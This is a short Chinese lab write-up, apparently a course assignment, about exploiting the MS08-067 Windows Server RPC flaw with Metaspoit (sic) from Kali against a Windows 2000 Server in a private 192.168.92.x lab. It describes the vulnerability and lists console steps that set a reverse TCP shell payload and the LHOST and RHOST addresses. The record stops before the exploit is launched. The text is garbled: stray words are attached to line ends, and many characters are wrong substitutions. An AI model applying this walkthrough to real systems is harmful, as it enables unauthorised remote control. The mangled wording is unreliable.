使用Metaspoit攻击MS08-067,提交正确获得远程shell过程的截图(很多于五张)。shell
MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,若是用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能容许远程执行代码。在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证便可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。windows
本次实验使用的攻击机是kali,靶机是Win2kServerapi
攻击机:192.168.92.147 靶机:192.168.92.148
输入show payloads会显示出有效的攻击载荷,好比shell_reverse_tcp
使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷
输入show targets会显示出能够被攻击的靶机的操做系统型号
输入命令set LHOST + 攻击机IP,即set LHOST 192.168.92.147; 输入命令set RHOST + 靶机IP,即set RHOST 192.168.92.148;